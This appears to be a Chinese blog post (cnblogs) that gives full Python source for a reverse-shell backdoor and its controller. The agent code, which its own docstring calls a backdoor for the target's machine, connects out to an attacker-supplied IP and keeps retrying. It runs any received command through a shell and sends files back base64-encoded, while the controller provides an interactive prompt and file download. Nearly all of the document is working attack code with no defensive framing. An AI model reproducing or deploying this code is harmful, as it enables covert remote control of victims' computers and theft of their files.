控制端代码:
import socket
import optparse
import sys
import threading
import json
import base64
class MyTCPServer:
def __init__(self) -> None:
self.port = self.get_param()
try:
self.s_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# self.s_socket.bind(('0.0.0.0', self.port))
self.s_socket.bind(('0.0.0.0', self.port))
self.s_socket.listen(5)
print("[+] Start listening on the port %d" % self.port)
except Exception as e:
print("[-] Failed to create listener: %s" % e)
sys.exit()
def get_param(self):
parser = optparse.OptionParser('./%s -p port' % sys.argv[0])
parser.add_option('-p', '--port', dest='port', type='int', help='Specify port number')
options, args = parser.parse_args()
if options.port is None:
print("[-] Specify port first")
sys.exit()
return options.port
def reliable_send(self,client_socket,data):
client_socket.send(json.dumps(data).encode('utf-8'))
def reliable_recv(self,client_socket):
data = ""
while True:
try:
recv_data = client_socket.recv(1024)
data = data + recv_data.decode('utf-8')
return json.loads(data)
except ValueError:
continue
def download_file(self, client_socket,file_path):
"""
Receive data from agent and write into the file with the same filename
"""
recv_data = self.reliable_recv(client_socket)
if recv_data.strip() == 'no file':
print("No such file in the current directory")
else:
"""
Very import to encode here, otherwise b64decode method will output wrong result
"""
recv_data_2 = recv_data.encode('ascii')
write_data = base64.b64decode(recv_data_2)
with open(file_path, 'wb') as f:
f.write(base64.b64decode(recv_data_2))
print('Downloaded successfully')
def client_handler(self, client_socket, client_address):
print("[+] Connected from :%s" % str(client_address))
while True:
command = input("%s~ " % client_address[0])
if command == 'q':
break
if command == '':
continue
if command.startswith('cd'):
self.reliable_send(client_socket,command)
recv_data = self.reliable_recv(client_socket)
print(recv_data)
continue
if command.startswith('download'):
print('Begin to download file...')
self.reliable_send(client_socket,command)
file_path = command.split()[1]
self.download_file(client_socket, file_path)
continue
self.reliable_send(client_socket,command)
recv_data = self.reliable_recv(client_socket)
print(recv_data)
client_socket.close()
def run(self):
try:
while True:
client_socket, client_address = self.s_socket.accept()
t = threading.Thread(target=self.client_handler, args=(client_socket, client_address))
t.start()
except KeyboardInterrupt:
print("[-] Exit the program now")
sys.exit()
except Exception as e:
print("[-] Something is wrong: %s" % e)
sys.exit()
if __name__ == '__main__':
server = MyTCPServer()
server.run()
被控制端代码:
import socket
import optparse
import sys
import subprocess
import json
import os
import base64
import time
"""
This code is for agent which can be installed into the target's machine. The code can act as backdoor which can get the command from controller
or hacker and reply back the results to the controller.
"""
class MyTCPClient:
def __init__(self) -> None:
"""
target: IP address of controller or hacker
port: port which can be used to connect to
"""
self.target = self.get_param()[0]
self.port = self.get_param()[1]
try:
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try:
self.client_socket.connect((self.target, self.port))
break
except:
time.sleep(2)
except Exception as e:
print("[-] Failed to connect to target: %s" % e)
sys.exit()
def get_param(self):
parser = optparse.OptionParser('./%s -t target ip address -p port' % sys.argv[0])
parser.add_option('-t', '--target', dest='target', type='string', help='Specify IP addresss to connect to')
parser.add_option('-p', '--port', dest='port', type='int', help='Specify port number')
options, args = parser.parse_args()
if options.target is None or options.port is None:
print(parser.usage)
sys.exit()
return options.target, options.port
def reliable_send(self,data):
"""
convert to JSON data before sending to the destination
"""
self.client_socket.send(json.dumps(data).encode('utf-8'))
def reliable_recv(self):
data = ""
while True:
try:
recv_data = self.client_socket.recv(1024)
data = data + recv_data.decode('utf-8')
return json.loads(data)
"""
Try to convert back to the orgininal data, catch the eror when the received data is incomplete and contitue to receive data from peer
"""
except ValueError:
continue
def download_file(self,file_path):
if not os.path.exists(file_path):
"""
If the requested file is not existent on the agent's computer, then reply back the result of 'no file'
"""
res = 'no file'
self.reliable_send(res)
else:
with open(file_path, 'rb') as f:
"""
Very important to decode bytes data before sending to the peer, otherwise the controller can't get the file properly
"""
send_data = base64.b64encode(f.read()).decode('ascii')
self.reliable_send(send_data)
def run(self):
while True:
# command = self.client_socket.recv(1024).decode('utf-8')
command = self.reliable_recv()
res = ""
print(command)
if command == 'q':
break
if command == '':
continue
if command.startswith('cd'):
cd_path = command.split()[1]
if not os.path.exists(cd_path):
res = 'No such directory to navigate'
self.reliable_send(res)
continue
else:
os.chdir(cd_path)
res = 'Changed successfully'
self.reliable_send(res)
continue
if command.startswith('download'):
print("Begin to download")
file_path = command.split()[1]
self.download_file(file_path)
continue
try:
result = subprocess.run(command, shell=True, capture_output=True)
if len(result.stderr) == 0:
res = result.stdout.decode('utf-8')
else:
res = result.stderr.decode('utf-8')
except Exception as e:
res = 'Failed to execute command'
print('Failed to execute: %s' % e)
print(res)
# self.client_socket.send(res)
self.reliable_send(res)
self.client_socket.close()
if __name__ == '__main__':
client = MyTCPClient()
client.run()
标签:Shell,socket,Python,recv,self,文件传输,client,data,port From: https://www.cnblogs.com/jason-huawen/p/17557721.html